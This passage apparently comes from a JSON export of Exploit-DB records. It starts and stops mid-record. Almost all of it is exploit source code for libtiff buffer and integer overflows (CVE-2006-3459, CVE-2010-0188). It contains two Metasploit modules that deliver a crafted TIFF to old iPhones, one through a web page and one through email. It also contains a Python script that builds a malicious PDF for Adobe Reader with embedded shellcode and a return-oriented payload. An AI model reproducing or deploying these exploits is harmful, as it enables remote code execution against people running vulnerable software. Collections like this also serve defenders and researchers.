It has shown us the way!\r\n\t\t# >> bl _memcpy\r\n\r\n\t\t# Its just over this bridge, Charlie!\r\n\t\t# This magical bridge!\r\n\t\t# >> ldr r3, [r4, #32]\r\n\t\t# >> ldrt r3, [pc], r3, lsr #30\r\n\t\t# >> str r3, [r4, #32]\r\n\t\t# >> ldr r3, [r4, #36]\r\n\t\t# >> ldrt r3, [pc], r3, lsr #30\r\n\t\t# >> str r3, [r4, #36]\r\n\t\t# >> ldr r3, [r4, #40]\r\n\t\t# >> ldrt r3, [pc], r3, lsr #30\r\n\t\t# >> str r3, [r4, #40]\r\n\t\t# >> ldr r3, [r4, #44]\r\n\t\t# >> ldrt r3, [pc], r3, lsr #30\r\n\t\t# >> str r3, [r4, #44]\r\n\r\n\t\t# We made it to candy mountain!\r\n\t\t# Go inside Charlie!\r\n\t\t# sub sp, r7, #0x14\r\n\t\thehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack(\"V\")\r\n\r\n\t\t# Goodbye Charlie!\r\n\t\t# ;; targ['Heap'] + 0x48 becomes the stack pointer\r\n\t\t# >> ldmia sp!, {r8, r10}\r\n\r\n\t\t# Hey, what the...!\r\n\t\t# >> ldmia sp!, {r4, r5, r6, r7, pc}\r\n\r\n\t\t# Return back to the copied heap data\r\n\t\thehe[192, 4] = [ targ['Heap'] + 196 ].pack(\"V\")\r\n\r\n\t\t# Insert our actual shellcode at heap location + 196\r\n\t\thehe[196, payload.encoded.length] = payload.encoded\r\n\r\n\t\ttiff << hehe\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16868/"}, {"lastseen": "2016-02-02T06:41:27", "bulletinFamily": "exploit", "description": "iPhone MobileSafari LibTIFF Buffer Overflow. CVE-2006-3459. Remote exploit for hardware platform", "modified": "2010-09-20T00:00:00", "published": "2010-09-20T00:00:00", "id": "EDB-ID:16862", "href": "https://www.exploit-db.com/exploits/16862/", "type": "exploitdb", "title": "iPhone MobileSafari LibTIFF Buffer Overflow", "sourceData": "##\r\n# $Id: safari_libtiff.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\t#\r\n\t# This module acts as an HTTP server\r\n\t#\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'iPhone MobileSafari LibTIFF Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in the version of\r\n\t\t\t\tlibtiff shipped with firmware versions 1.00, 1.01, 1.02, and\r\n\t\t\t\t1.1.1 of the Apple iPhone. iPhones which have not had the BSD\r\n\t\t\t\ttools installed will need to use a special payload.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => ['hdm', 'kf'],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2006-3459'],\r\n\t\t\t\t\t['OSVDB', '27723'],\r\n\t\t\t\t\t['BID', '19283']\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1800,\r\n\t\t\t\t\t'BadChars' => \"\",\r\n\r\n\t\t\t\t\t# Multi-threaded applications are not allowed to execve() on OS X\r\n\t\t\t\t\t# This stub injects a vfork/exit in front of the payload\r\n\t\t\t\t\t'Prepend' =>\r\n\t\t\t\t\t\t[\r\n\t\t\t\t\t\t\t0xe3a0c042, # vfork\r\n\t\t\t\t\t\t\t0xef000080, # sc\r\n\t\t\t\t\t\t\t0xe3500000, # cmp r0, #0\r\n\t\t\t\t\t\t\t0x1a000001, # bne\r\n\t\t\t\t\t\t\t0xe3a0c001, # exit(0)\r\n\t\t\t\t\t\t\t0xef000080 # sc\r\n\t\t\t\t\t\t].pack(\"V*\")\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\r\n\t\t\t\t\t[ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\r\n\t\t\t\t\t\t\t# Scratch space for our shellcode and stack\r\n\t\t\t\t\t\t\t'Heap' => 0x00802000,\r\n\r\n\t\t\t\t\t\t\t# Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib\r\n\t\t\t\t\t\t\t'Magic' => 0x300d562c,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Aug 01 2006'\r\n\t\t\t))\r\n\tend\r\n\r\n\tdef on_request_uri(cli, req)\r\n\r\n\r\n\t\t# Re-generate the payload\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\t# Grab reference to the target\r\n\t\tt = target\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the compressed response to the client\r\n\t\tsend_response(cli, generate_tiff(p, t), { 'Content-Type' => 'image/tiff' })\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\n\tdef generate_tiff(code, targ)\r\n\r\n\t\t#\r\n\t\t# This is a TIFF file, we have a huge range of evasion\r\n\t\t# capabilities, but for now, we don't use them.\r\n\t\t# - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday\r\n\t\t#\r\n\r\n\t\tlolz = 2048\r\n\t\ttiff =\r\n\t\t\t\"\\x49\\x49\\x2a\\x00\\x1e\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\r\n\t\t\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\r\n\t\t\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x01\\x03\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x01\\x01\\x03\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x03\\x01\\x03\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\xaa\\x00\\x00\\x00\\x06\\x01\\x03\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\xbb\\x00\\x00\\x00\\x11\\x01\\x04\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x17\\x01\\x04\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\x15\\x00\\x00\\x00\\x1c\\x01\\x03\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x50\\x01\\x03\\x00\"+\r\n\t\t\t[lolz].pack(\"V\") +\r\n\t\t\t\"\\x84\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\r\n\t\t# Randomize the bajeezus out of our data\r\n\t\thehe = rand_text(lolz)\r\n\r\n\t\t# Were going to candy mountain!\r\n\t\thehe[120, 4] = [targ['Magic']].pack(\"V\")\r\n\r\n\t\t# >> add r0, r4, #0x30\r\n\t\thehe[104, 4] = [ targ['Heap'] - 0x30 ].pack(\"V\")\r\n\r\n\t\t# Candy mountain, Charlie!\r\n\t\t# >> mov r1, sp\r\n\r\n\t\t# It will be an adventure!\r\n\t\t# >> mov r2, r8\r\n\t\thehe[ 92, 4] = [ hehe.length ].pack(\"V\")\r\n\r\n\t\t# Its a magic leoplurodon!\r\n\t\t# It has spoken!\r\n\t\t# It has shown us the way!\r\n\t\t# >> bl _memcpy\r\n\r\n\t\t# Its just over this bridge, Charlie!\r\n\t\t# This magical bridge!\r\n\t\t# >> ldr r3, [r4, #32]\r\n\t\t# >> ldrt r3, [pc], r3, lsr #30\r\n\t\t# >> str r3, [r4, #32]\r\n\t\t# >> ldr r3, [r4, #36]\r\n\t\t# >> ldrt r3, [pc], r3, lsr #30\r\n\t\t# >> str r3, [r4, #36]\r\n\t\t# >> ldr r3, [r4, #40]\r\n\t\t# >> ldrt r3, [pc], r3, lsr #30\r\n\t\t# >> str r3, [r4, #40]\r\n\t\t# >> ldr r3, [r4, #44]\r\n\t\t# >> ldrt r3, [pc], r3, lsr #30\r\n\t\t# >> str r3, [r4, #44]\r\n\r\n\t\t# We made it to candy mountain!\r\n\t\t# Go inside Charlie!\r\n\t\t# sub sp, r7, #0x14\r\n\t\thehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack(\"V\")\r\n\r\n\t\t# Goodbye Charlie!\r\n\t\t# ;; targ['Heap'] + 0x48 becomes the stack pointer\r\n\t\t# >> ldmia sp!, {r8, r10}\r\n\r\n\t\t# Hey, what the...!\r\n\t\t# >> ldmia sp!, {r4, r5, r6, r7, pc}\r\n\r\n\t\t# Return back to the copied heap data\r\n\t\thehe[192, 4] = [ targ['Heap'] + 196 ].pack(\"V\")\r\n\r\n\t\t# Insert our actual shellcode at heap location + 196\r\n\t\thehe[196, payload.encoded.length] = payload.encoded\r\n\r\n\t\ttiff << hehe\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16862/"}, {"lastseen": "2016-02-02T06:42:37", "bulletinFamily": "exploit", "description": "iPhone MobileMail LibTIFF Buffer Overflow. CVE-2006-3459. Remote exploit for hardware platform", "modified": "2010-09-20T00:00:00", "published": "2010-09-20T00:00:00", "id": "EDB-ID:16869", "href": "https://www.exploit-db.com/exploits/16869/", "type": "exploitdb", "title": "iPhone MobileMail LibTIFF Buffer Overflow", "sourceData": "##\r\n# $Id: mobilemail_libtiff.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\t#\r\n\t# This module sends email messages via smtp\r\n\t#\r\n\tinclude Msf::Exploit::Remote::SMTPDeliver\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'iPhone MobileMail LibTIFF Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in the version of\r\n\t\t\t\tlibtiff shipped with firmware versions 1.00, 1.01, 1.02, and\r\n\t\t\t\t1.1.1 of the Apple iPhone. iPhones which have not had the BSD\r\n\t\t\t\ttools installed will need to use a special payload.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => ['hdm', 'kf'],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2006-3459'],\r\n\t\t\t\t\t['OSVDB', '27723'],\r\n\t\t\t\t\t['BID', '19283']\r\n\t\t\t\t],\r\n\t\t\t'Stance' => Msf::Exploit::Stance::Passive,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1800,\r\n\t\t\t\t\t'BadChars' => \"\",\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'ConnectionType' => '-bind -find',\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\r\n\t\t\t\t\t[ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\r\n\t\t\t\t\t\t\t# Scratch space for our shellcode and stack\r\n\t\t\t\t\t\t\t'Heap' => 0x00802000,\r\n\r\n\t\t\t\t\t\t\t# Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib\r\n\t\t\t\t\t\t\t'Magic' => 0x300d562c,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Aug 01 2006'\r\n\t\t\t))\r\n\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\texts = ['jpg', 'tiff', 'tif']\r\n\r\n\t\tgext = exts[rand(exts.length)]\r\n\t\tname = rand_text_alpha(rand(10)+1) + \".#{gext}\"\r\n\t\tdata = Rex::Text.rand_text_alpha(rand(32)+1)\r\n\t\ttiff = generate_tiff(target)\r\n\r\n\t\tmsg = Rex::MIME::Message.new\r\n\t\tmsg.mime_defaults\r\n\t\tmsg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)\r\n\t\tmsg.to = datastore['MAILTO']\r\n\t\tmsg.from = datastore['MAILFROM']\r\n\r\n\t\tmsg.add_part(Rex::Text.encode_base64(data, \"\\r\\n\"), \"text/plain\", \"base64\", \"inline\")\r\n\t\tmsg.add_part_attachment(tiff, rand_text_alpha(rand(32)+1) + \".\" + gext)\r\n\r\n\t\tsend_message(msg.to_s)\r\n\r\n\t\tprint_status(\"Waiting for a payload session (backgrounding)...\")\r\n\tend\r\n\r\n\tdef generate_tiff(targ)\r\n\t\t#\r\n\t\t# This is a TIFF file, we have a huge range of evasion\r\n\t\t# capabilities, but for now, we don't use them.\r\n\t\t# - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday\r\n\t\t#\r\n\r\n\t\tlolz = 2048\r\n\t\ttiff =\r\n\t\t\t\"\\x49\\x49\\x2a\\x00\\x1e\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\r\n\t\t\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\r\n\t\t\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x01\\x03\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x01\\x01\\x03\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x03\\x01\\x03\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\xaa\\x00\\x00\\x00\\x06\\x01\\x03\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\xbb\\x00\\x00\\x00\\x11\\x01\\x04\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x17\\x01\\x04\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\x15\\x00\\x00\\x00\\x1c\\x01\\x03\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x50\\x01\\x03\\x00\"+\r\n\t\t\t[lolz].pack(\"V\") +\r\n\t\t\t\"\\x84\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\r\n\t\t# Randomize the bajeezus out of our data\r\n\t\thehe = rand_text(lolz)\r\n\r\n\t\t# Were going to candy mountain!\r\n\t\thehe[120, 4] = [targ['Magic']].pack(\"V\")\r\n\r\n\t\t# >> add r0, r4, #0x30\r\n\t\thehe[104, 4] = [ targ['Heap'] - 0x30 ].pack(\"V\")\r\n\r\n\t\t# Candy mountain, Charlie!\r\n\t\t# >> mov r1, sp\r\n\r\n\t\t# It will be an adventure!\r\n\t\t# >> mov r2, r8\r\n\t\thehe[ 92, 4] = [ hehe.length ].pack(\"V\")\r\n\r\n\t\t# Its a magic leoplurodon!\r\n\t\t# It has spoken!\r\n\t\t# It has shown us the way!\r\n\t\t# >> bl _memcpy\r\n\r\n\t\t# Its just over this bridge, Charlie!\r\n\t\t# This magical bridge!\r\n\t\t# >> ldr r3, [r4, #32]\r\n\t\t# >> ldrt r3, [pc], r3, lsr #30\r\n\t\t# >> str r3, [r4, #32]\r\n\t\t# >> ldr r3, [r4, #36]\r\n\t\t# >> ldrt r3, [pc], r3, lsr #30\r\n\t\t# >> str r3, [r4, #36]\r\n\t\t# >> ldr r3, [r4, #40]\r\n\t\t# >> ldrt r3, [pc], r3, lsr #30\r\n\t\t# >> str r3, [r4, #40]\r\n\t\t# >> ldr r3, [r4, #44]\r\n\t\t# >> ldrt r3, [pc], r3, lsr #30\r\n\t\t# >> str r3, [r4, #44]\r\n\r\n\t\t# We made it to candy mountain!\r\n\t\t# Go inside Charlie!\r\n\t\t# sub sp, r7, #0x14\r\n\t\thehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack(\"V\")\r\n\r\n\t\t# Goodbye Charlie!\r\n\t\t# ;; targ['Heap'] + 0x48 becomes the stack pointer\r\n\t\t# >> ldmia sp!, {r8, r10}\r\n\r\n\t\t# Hey, what the...!\r\n\t\t# >> ldmia sp!, {r4, r5, r6, r7, pc}\r\n\r\n\t\t# Return back to the copied heap data\r\n\t\thehe[192, 4] = [ targ['Heap'] + 196 ].pack(\"V\")\r\n\r\n\t\t# Insert our actual shellcode at heap location + 196\r\n\t\thehe[196, payload.encoded.length] = payload.encoded\r\n\r\n\t\ttiff << hehe\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16869/"}, {"lastseen": "2016-02-01T15:02:26", "bulletinFamily": "exploit", "description": "Adobe Reader PDF LibTiff Integer Overflow Code Execution. CVE-2006-3459,CVE-2010-0188. Local exploit for windows platform", "modified": "2010-03-17T00:00:00", "published": "2010-03-17T00:00:00", "id": "EDB-ID:11787", "href": "https://www.exploit-db.com/exploits/11787/", "type": "exploitdb", "title": "Adobe Reader PDF LibTiff Integer Overflow Code Execution", "sourceData": "__doc__='''\r\n\r\nTitle: Adobe PDF LibTiff Integer Overflow Code Execution.\r\nProduct: Adobe Acrobat Reader\r\nVersion: <=8.3.0, <=9.3.0\r\nCVE: 2010-0188\r\nAuthor: villy (villys777 at gmail.com)\r\nSite: http://bugix-security.blogspot.com/\r\nTested : succesfully tested on Adobe Reader 9.1/9.2/9.3 OS Windows XP(SP2,SP3)\r\n------------------------------------------------------------------------\r\n'''\r\nimport sys\r\nimport base64\r\nimport struct\r\nimport zlib\r\nimport StringIO\r\n\r\nSHELLCODE_OFFSET=0x555\r\nTIFF_OFSET=0x2038\r\n\r\n# windows/exec - 227 bytes\r\n# http://www.metasploit.com\r\n# Encoder: x86/shikata_ga_nai\r\n# EXITFUNC=process, CMD=calc.exe\r\nbuf = \"\\x2b\\xc9\\xd9\\xc0\\xd9\\x74\\x24\\xf4\\x5e\\xb1\\x33\\xba\\xd9\\xb4\"\r\nbuf += \"\\x0a\\xbe\\x31\\x56\\x15\\x03\\x56\\x15\\x83\\x1f\\xb0\\xe8\\x4b\\x63\"\r\nbuf += \"\\x51\\x65\\xb3\\x9b\\xa2\\x16\\x3d\\x7e\\x93\\x04\\x59\\x0b\\x86\\x98\"\r\nbuf += \"\\x29\\x59\\x2b\\x52\\x7f\\x49\\xb8\\x16\\xa8\\x7e\\x09\\x9c\\x8e\\xb1\"\r\nbuf += \"\\x8a\\x10\\x0f\\x1d\\x48\\x32\\xf3\\x5f\\x9d\\x94\\xca\\x90\\xd0\\xd5\"\r\nbuf += \"\\x0b\\xcc\\x1b\\x87\\xc4\\x9b\\x8e\\x38\\x60\\xd9\\x12\\x38\\xa6\\x56\"\r\nbuf += \"\\x2a\\x42\\xc3\\xa8\\xdf\\xf8\\xca\\xf8\\x70\\x76\\x84\\xe0\\xfb\\xd0\"\r\nbuf += \"\\x35\\x11\\x2f\\x03\\x09\\x58\\x44\\xf0\\xf9\\x5b\\x8c\\xc8\\x02\\x6a\"\r\nbuf += \"\\xf0\\x87\\x3c\\x43\\xfd\\xd6\\x79\\x63\\x1e\\xad\\x71\\x90\\xa3\\xb6\"\r\nbuf += \"\\x41\\xeb\\x7f\\x32\\x54\\x4b\\x0b\\xe4\\xbc\\x6a\\xd8\\x73\\x36\\x60\"\r\nbuf += \"\\x95\\xf0\\x10\\x64\\x28\\xd4\\x2a\\x90\\xa1\\xdb\\xfc\\x11\\xf1\\xff\"\r\nbuf += \"\\xd8\\x7a\\xa1\\x9e\\x79\\x26\\x04\\x9e\\x9a\\x8e\\xf9\\x3a\\xd0\\x3c\"\r\nbuf += \"\\xed\\x3d\\xbb\\x2a\\xf0\\xcc\\xc1\\x13\\xf2\\xce\\xc9\\x33\\x9b\\xff\"\r\nbuf += \"\\x42\\xdc\\xdc\\xff\\x80\\x99\\x13\\x4a\\x88\\x8b\\xbb\\x13\\x58\\x8e\"\r\nbuf += \"\\xa1\\xa3\\xb6\\xcc\\xdf\\x27\\x33\\xac\\x1b\\x37\\x36\\xa9\\x60\\xff\"\r\nbuf += \"\\xaa\\xc3\\xf9\\x6a\\xcd\\x70\\xf9\\xbe\\xae\\x17\\x69\\x22\\x1f\\xb2\"\r\nbuf += \"\\x09\\xc1\\x5f\\x00\"\r\n\r\nclass CVE20100188Exploit:\r\n\tdef __init__(self,shellcode):\r\n\t\tself.shellcode = shellcode\r\n\t\tself.tiff64=base64.b64encode(self.gen_tiff())\r\n\r\n\tdef gen_tiff(self):\r\n\t\ttiff = '\\x49\\x49\\x2a\\x00'\r\n\t\ttiff += struct.pack(\"<L\", TIFF_OFSET)\r\n\r\n\t\ttiff += '\\x90' * (SHELLCODE_OFFSET)\r\n\t\ttiff += self.shellcode\r\n\t\ttiff += '\\x90' * (TIFF_OFSET - 8 - len(buf) - SHELLCODE_OFFSET)\r\n\r\n\t\ttiff += \"\\x07\\x00\\x00\\x01\\x03\\x00\\x01\\x00\"\r\n\t\ttiff += \"\\x00\\x00\\x30\\x20\\x00\\x00\\x01\\x01\\x03\\x00\\x01\\x00\\x00\\x00\\x01\\x00\"\r\n\t\ttiff += \"\\x00\\x00\\x03\\x01\\x03\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x06\\x01\"\r\n\t\ttiff += \"\\x03\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x11\\x01\\x04\\x00\\x01\\x00\"\r\n\t\ttiff += \"\\x00\\x00\\x08\\x00\\x00\\x00\\x17\\x01\\x04\\x00\\x01\\x00\\x00\\x00\\x30\\x20\"\r\n\t\ttiff += \"\\x00\\x00\\x50\\x01\\x03\\x00\\xCC\\x00\\x00\\x00\\x92\\x20\\x00\\x00\\x00\\x00\"\r\n\t\ttiff += \"\\x00\\x00\\x00\\x0C\\x0C\\x08\\x24\\x01\\x01\\x00\\xF7\\x72\\x00\\x07\\x04\\x01\"\r\n\t\ttiff += \"\\x01\\x00\\xBB\\x15\\x00\\x07\\x00\\x10\\x00\\x00\\x4D\\x15\\x00\\x07\\xBB\\x15\"\r\n\t\ttiff += \"\\x00\\x07\\x00\\x03\\xFE\\x7F\\xB2\\x7F\\x00\\x07\\xBB\\x15\\x00\\x07\\x11\\x00\"\r\n\t\ttiff += \"\\x01\\x00\\xAC\\xA8\\x00\\x07\\xBB\\x15\\x00\\x07\\x00\\x01\\x01\\x00\\xAC\\xA8\"\r\n\t\ttiff += \"\\x00\\x07\\xF7\\x72\\x00\\x07\\x11\\x00\\x01\\x00\\xE2\\x52\\x00\\x07\\x54\\x5C\"\r\n\t\ttiff += \"\\x00\\x07\\xFF\\xFF\\xFF\\xFF\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x04\\x01\"\r\n\t\ttiff += \"\\x01\\x00\\x00\\x10\\x00\\x00\\x40\\x00\\x00\\x00\\x31\\xD7\\x00\\x07\\xBB\\x15\"\r\n\t\ttiff += \"\\x00\\x07\\x5A\\x52\\x6A\\x02\\x4D\\x15\\x00\\x07\\x22\\xA7\\x00\\x07\\xBB\\x15\"\r\n\t\ttiff += \"\\x00\\x07\\x58\\xCD\\x2E\\x3C\\x4D\\x15\\x00\\x07\\x22\\xA7\\x00\\x07\\xBB\\x15\"\r\n\t\ttiff += \"\\x00\\x07\\x05\\x5A\\x74\\xF4\\x4D\\x15\\x00\\x07\\x22\\xA7\\x00\\x07\\xBB\\x15\"\r\n\t\ttiff += \"\\x00\\x07\\xB8\\x49\\x49\\x2A\\x4D\\x15\\x00\\x07\\x22\\xA7\\x00\\x07\\xBB\\x15\"\r\n\t\ttiff += \"\\x00\\x07\\x00\\x8B\\xFA\\xAF\\x4D\\x15\\x00\\x07\\x22\\xA7\\x00\\x07\\xBB\\x15\"\r\n\t\ttiff += \"\\x00\\x07\\x75\\xEA\\x87\\xFE\\x4D\\x15\\x00\\x07\\x22\\xA7\\x00\\x07\\xBB\\x15\"\r\n\t\ttiff += \"\\x00\\x07\\xEB\\x0A\\x5F\\xB9\\x4D\\x15\\x00\\x07\\x22\\xA7\\x00\\x07\\xBB\\x15\"\r\n\t\ttiff += \"\\x00\\x07\\xE0\\x03\\x00\\x00\\x4D\\x15\\x00\\x07\\x22\\xA7\\x00\\x07\\xBB\\x15\"\r\n\t\ttiff += \"\\x00\\x07\\xF3\\xA5\\xEB\\x09\\x4D\\x15\\x00\\x07\\x22\\xA7\\x00\\x07\\xBB\\x15\"\r\n\t\ttiff += \"\\x00\\x07\\xE8\\xF1\\xFF\\xFF\\x4D\\x15\\x00\\x07\\x22\\xA7\\x00\\x07\\xBB\\x15\"\r\n\t\ttiff += \"\\x00\\x07\\xFF\\x90\\x90\\x90\\x4D\\x15\\x00\\x07\\x22\\xA7\\x00\\x07\\xBB\\x15\"\r\n\t\ttiff += \"\\x00\\x07\\xFF\\xFF\\xFF\\x90\\x4D\\x15\\x00\\x07\\x31\\xD7\\x00\\x07\\x2F\\x11\"\r\n\t\ttiff += \"\\x00\\x07\"\r\n\t\treturn tiff\r\n\t\r\n\r\n\tdef gen_xml(self):\r\n\t\txml= '''<?xml version=\"1.0\" encoding=\"UTF-8\" ?> \r\n<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\">\r\n<config xmlns=\"http://www.xfa.org/schema/xci/1.0/\">\r\n<present>\r\n<pdf>\r\n<version>1.65</version> \r\n<interactive>1</interactive> \r\n<linearized>1</linearized> \r\n</pdf>\r\n<xdp>\r\n<packets>*</packets> \r\n</xdp>\r\n<destination>pdf</destination> \r\n</present>\r\n</config>\r\n<template baseProfile=\"interactiveForms\" xmlns=\"http://www.xfa.org/schema/xfa-template/2.4/\">\r\n<subform name=\"topmostSubform\" layout=\"tb\" locale=\"en_US\">\r\n<pageSet>\r\n<pageArea id=\"PageArea1\" name=\"PageArea1\">\r\n<contentArea name=\"ContentArea1\" x=\"0pt\" y=\"0pt\" w=\"612pt\" h=\"792pt\" /> \r\n<medium short=\"612pt\" long=\"792pt\" stock=\"custom\" /> \r\n</pageArea>\r\n</pageSet>\r\n<subform name=\"Page1\" x=\"0pt\" y=\"0pt\" w=\"612pt\" h=\"792pt\">\r\n<break before=\"pageArea\" beforeTarget=\"#PageArea1\" /> \r\n<bind match=\"none\" /> \r\n<field name=\"ImageField1\" w=\"28.575mm\" h=\"1.39mm\" x=\"37.883mm\" y=\"29.25mm\">\r\n<ui>\r\n<imageEdit /> \r\n</ui>\r\n</field>\r\n<?templateDesigner expand 1?> \r\n</subform>\r\n<?templateDesigner expand 1?> \r\n</subform>\r\n<?templateDesigner FormTargetVersion 24?> \r\n<?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?> \r\n<?templateDesigner Zoom 94?> \r\n</template>\r\n<xfa:datasets xmlns:xfa=\"http://www.xfa.org/schema/xfa-data/1.0/\">\r\n<xfa:data>\r\n<topmostSubform>\r\n<ImageField1 xfa:contentType=\"image/tif\" href=\"\">'''+self.tiff64 +'''</ImageField1> \r\n</topmostSubform>\r\n</xfa:data>\r\n</xfa:datasets>\r\n<PDFSecurity xmlns=\"http://ns.adobe.com/xtd/\" print=\"1\" printHighQuality=\"1\" change=\"1\" modifyAnnots=\"1\" formFieldFilling=\"1\" documentAssembly=\"1\" contentCopy=\"1\" accessibleContent=\"1\" metadata=\"1\" /> \r\n<form checksum=\"a5Mpguasoj4WsTUtgpdudlf4qd4=\" xmlns=\"http://www.xfa.org/schema/xfa-form/2.8/\">\r\n<subform name=\"topmostSubform\">\r\n<instanceManager name=\"_Page1\" /> \r\n<subform name=\"Page1\">\r\n<field name=\"ImageField1\" /> \r\n</subform>\r\n<pageSet>\r\n<pageArea name=\"PageArea1\" /> \r\n</pageSet>\r\n</subform>\r\n</form>\r\n</xdp:xdp>\r\n\r\n'''\r\n\t\treturn xml\r\n\r\n\tdef gen_pdf(self):\r\n\t\txml = zlib.compress(self.gen_xml())\r\n\t\tpdf='''%PDF-1.6\r\n1 0 obj \r\n<</Filter /FlateDecode/Length ''' + str(len(xml)) + '''/Type /EmbeddedFile>>\r\nstream\r\n''' + 